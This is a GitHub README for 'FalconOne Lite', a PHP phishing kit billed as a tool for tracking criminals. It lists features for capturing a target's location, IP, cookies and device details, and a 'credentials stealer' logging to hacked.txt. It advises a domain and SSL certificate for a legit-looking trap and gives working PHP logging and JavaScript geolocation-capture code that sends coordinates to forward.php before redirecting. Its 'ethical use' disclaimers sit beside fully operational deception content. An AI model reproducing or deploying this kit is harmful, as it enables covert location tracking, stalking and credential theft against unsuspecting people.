strikevaults / falconone Goto Github PK

(v.0.4) - Lite

FalconOne Lite is an Open Source solution deployed and updated on a daily basis to help prevent terror and crime globally. By using advanced tools, functions and stealth strategies, FalconOne community is focused on making a friendly and fast solution for effective results.

FalconOne can be used for the following purposes:

• Main Purpose: Locating and tracking victims or criminals (through social engineering and intelligence exercises using existing or customized templates)
• Red Teaming and Penetration Testing
• Web and Mobile development
• Emergency
• Educational and Researches

For more information about the FalconOne Pro, please send an email to the Team at [email protected].

GENERAL NOTICE:

FalconOne Lite is deployed for ethical and educational purposes only.

Users Should READ the Terms before starting the installation process.

1. Features
2. Scenarios
3. Tool Overview
4. Prerequisites
5. Installation/Setup
6. Usage
7. Community
8. User Terms
9. Releases
10. Templates

Extra Links for Reconnaissance Purposes

• Target Accurate Location (via Google API logged in info.txt)
• Target Public IP Address (log.txt)
• Target Open Port (log.txt)
• Target Device Model and its Version (log.txt)
• Target Browser Model and its Version (log.txt)
• Target Operating System and its Version (log.txt)
• Target Cookies (log.txt)
• Visitors User-Agent Information (l.log)
• Sharing Cycle User-Agent Information collection. This works with WhatsApp, Telegram and other social networks. (Once the Meta-Description is visible on Target/sharer devices and finally shared, sharer collected User-Agent information are logged in l.log)
• Target Credentials Stealer (hacked.txt)
• Target Webcam Activation (In progress)
• Target Microphone Activation (In progress)
• Target Screen Screenshot (In progress)

• Spoofers (Extension in Progress) please visit the SpoofDeck repository to get started.

• Got Scammed?
• Dealing with a Kidnapper?
• Aware of Malicious activities?
• In Contact with a Missing Person?

FalconOne Lite is based on PHP functions that collects and triggers browser's information functionalities via disguised HTML and CSS templates. FalconOne Lite is coded as explained below:

• index.php (Main Landing page)

• styles/
  • /footer.css
  • /join.css
  • /main.css
  • /forms.css

• forward.php
• credentials.php

• info.txt (for Locations)
• log.txt (for Geolocated Target User-Agent information)
• l.log (for Visitor's or Sharers User-Agent information)
• hacked.txt (for Credentials Username/Password)

• Apache (Tested) or Nginx Server
• Public IP Address or a Tunnel (e.g. Ngrok)
• Domain Name (Recommended for a legit approach)
• SSL Certificate (for a secure look)

• Upload the Zip file on your Web Server Public directory
• Unzip the FolconOne Lite uploaded file
• Customize index.php and CSS Styles files according to your trapping scenario

Once deployed, wait for the target to interact with the landing page functions such as buttons, links, images and popups. Once the Target interacts with the Landing page function(s), location(s) should be stored in info.txt and other information in log.txt.

The tracking script should be kept between head and body for activity tracking (l.log):

<?php
if(filesize('./l.log') > 3000000) {
	@file_put_contents('./l.log', ""); // empty log if > 3MB.
	} else {
	$log = date("F j, Y, g:i a") . ' - '. $_SERVER['REMOTE_ADDR'].' - '.$_SERVER['HTTP_USER_AGENT'].' - '. $_SERVER['HTTP_REFERER'].' - '.$_SERVER['SCRIPT_NAME']. ' - '.$_SERVER['QUERY_STRING']. PHP_EOL;
	@file_put_contents('./l.log', htmlspecialchars($log,ENT_QUOTES,'UTF-8'), FILE_APPEND);
}
?>

The following PHP Functions logic in index.php should not be changed:

<p id="errorMessage"></p>

<script>
let message = document.getElementById("errorMessage");

function getLocation(){
  if(navigator.geolocation){
    navigator.geolocation.getCurrentPosition(sendLocation);
  } else{ 
    message.innerHTML = "<em>Your browser is not supported.</em>";
  }
}

function sendLocation(geoLocation) {
  window.location = "forward.php?x="+geoLocation.coords.latitude+"&y="+geoLocation.coords.longitude;
}
</script>

In forward.php line 37, you can edit the redirection URL which is google.com by default:

header('Location: https://www.google.com/');

Or else redirection on line 40 which is index.html by default:

header('Location: index.php');

The main getLocation Hook function should be respected as below:

<a class="yourstyle" onclick="getLocation()">Button</a>

... In Progress

• Users are not allowed to deploy FalconOne Lite for malicious operations
• Users are not allowed to sell FalconOne Lite
• FalconOne Lite is FREE
• FalconOne Lite can be edited according to Users needs

+ Added credentials.php
+ Added hacked.txt
+ Added images file
+ forms.css
+ index.php adaption

+ Added index.php
+ Added l.log
- index.html Removed

+ fixes

+ Initial Code Upload

... In Progress

... In Progress

... In Progress

... In Progress

• Pegasus Spyware Samples Decompiled & Recompiled: @jonathandata1
• OSINT Tools Collections: @cipher387